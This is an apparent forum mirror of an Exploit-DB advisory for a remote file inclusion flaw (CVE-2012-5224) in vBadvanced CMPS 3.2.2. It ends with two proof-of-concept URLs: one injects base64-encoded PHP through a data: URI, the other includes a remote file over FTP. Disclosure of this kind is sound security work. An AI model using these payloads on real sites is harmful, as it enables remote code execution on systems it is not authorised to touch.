- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36628
- Проверка EDB
-
- Пройдено
- Автор
- PACKETIK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-5224
- Дата публикации
- 2012-01-25
vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion
Код:
source: https://www.securityfocus.com/bid/51672/info
vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:[email protected]/123.txt- Источник
- www.exploit-db.com